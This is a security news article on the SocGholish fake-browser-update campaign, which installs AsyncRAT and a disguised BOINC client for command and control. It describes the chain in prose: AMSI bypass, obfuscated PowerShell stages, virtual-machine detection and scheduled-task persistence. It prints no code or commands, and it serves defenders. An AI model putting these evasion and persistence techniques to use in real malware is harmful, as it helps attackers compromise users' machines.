Thursday, October 3, 2024
HomeCyber AttackBeware Of Fake Browser Updates That Installs Malicious BOINC Infrastructre

Beware Of Fake Browser Updates That Installs Malicious BOINC Infrastructre

Published on

SocGholish malware, also known as FakeUpdates, has exhibited new behavior since July 4th, 2024, as the infection chain still begins with a compromised website prompting a fake browser update. 

Downloading the update triggers malicious code that fetches additional malware. Unlike prior campaigns where SocGholish installed common RATs, recent attacks involved the execution of additional files and scripts, deviating from the usual patterns.  

Infection Chain

The initial malicious Javascript downloads a PowerShell script that bypasses AMSI and fetches the next stage loader from a DGA-generated domain.

- Advertisement - EHA

Protect Your Business Emails From Spoofing, Phishing & BEC with AI-Powered Security | Free Demo

This second stage decodes, decrypts, and decompresses a third-stage PowerShell script using a Base64 encoded string, a hardcoded XOR key, and Gzip compression. The functionality can be replicated in CyberChef to reveal the final AsyncRAT payload.  

CyberChef recipe to decode the obfuscated AsyncRAT PowerShell commands.

Stage 3 of the AsyncRAT malware uses various techniques to detect virtualized environments, which check for specific strings in system information like “VMware” or “VirtualBox” and assign scores. 

A higher score indicates a higher likelihood of being in a virtual machine, and the final score is then incorporated into a cURL request parameter along with a randomly generated domain name fetched by the Domain Generation Algorithm (DGA).

If the score passes the threshold on the C2 server, the final AsyncRAT payload is delivered.  

 The domain used by the final AsyncRAT payload.

A malicious PowerShell script disguised as a BOINC software installation uses cURL to download a file and then creates a random directory and file name, downloads a ZIP archive, extracts it, renames a file likely containing malware (BOINC.exe), and creates a scheduled task to execute it. 

To potentially evade detection, the script removes itself and creates a registry value with a misspelled key name (“ExpirienceHost”) as a possible infection marker. 

Strings from the process memory of PowerShell show the scheduled task creation.

SocGholish malware is abusing BOINC, an open-source distributed computing software, to create a command-and-control (C2) server by installing a disguised BOINC client that connects to a malicious server instead of legitimate BOINC servers. 

While no malicious tasks have been observed yet, the attacker can potentially steal information, transfer files, or execute further malware on the infected hosts.

Malicious server project status page.

An AsyncRAT infection was discovered through the analysis of scheduled tasks, which include malicious PowerShell commands disguised within log file names and executed by a headless Conhost process. 

It establishes persistence for the AsyncRAT and maintains connections to its C2 server, and tasks associated with a BOINC client were found, which may be a downloaded component for cryptocurrency mining or other purposes. 

According to Huntress, the techniques used in this attack closely resemble those linked to the SocGholish malware family, particularly its use of fake browser updates for initial access and obfuscated PowerShell downloads for AsyncRAT deployment.  

Join our free webinar to learn about combating slow DDoS attacks, a major threat today.

Raga Varshini
Raga Varshini
Varshini is a Cyber Security expert in Threat Analysis, Vulnerability Assessment, and Research. Passionate about staying ahead of emerging Threats and Technologies.

Latest articles

Cisco Nexus Vulnerability Let Hackers Execute Arbitrary Commands on Vulnerable Systems

A critical vulnerability has been discovered in Cisco's Nexus Dashboard Fabric Controller (NDFC), potentially...

Hackers Now Exploit Ivanti Endpoint Manager Vulnerability to Launch Cyber Attacks

The Cybersecurity and Infrastructure Security Agency (CISA) has announced the addition of a new...

Tor Browser 13.5.6 Released – What’s New!

The Tor Project has announced the release of Tor Browser 13.5.6, which is now...

Mario Duarte, Former Snowflake Cybersecurity Leader, Joins Aembit as CISO to Tackle Non-Human Identities

Aembit, the non-human IAM company, today announced the appointment of Mario Duarte as chief...

Free Webinar

Decoding Compliance | What CISOs Need to Know

Non-compliance can result in substantial financial penalties, with average fines reaching up to $4.5 million for GDPR breaches alone.

Join us for an insightful panel discussion with Chandan Pani, CISO - LTIMindtree and Ashish Tandon, Founder & CEO – Indusface, as we explore the multifaceted role of compliance in securing modern enterprises.

Discussion points

The Role of Compliance
The Alphabet Soup of Compliance
Compliance
SaaS and Compliance
Indusface's Approach to Compliance

More like this

Cisco Nexus Vulnerability Let Hackers Execute Arbitrary Commands on Vulnerable Systems

A critical vulnerability has been discovered in Cisco's Nexus Dashboard Fabric Controller (NDFC), potentially...

Hackers Now Exploit Ivanti Endpoint Manager Vulnerability to Launch Cyber Attacks

The Cybersecurity and Infrastructure Security Agency (CISA) has announced the addition of a new...

Tor Browser 13.5.6 Released – What’s New!

The Tor Project has announced the release of Tor Browser 13.5.6, which is now...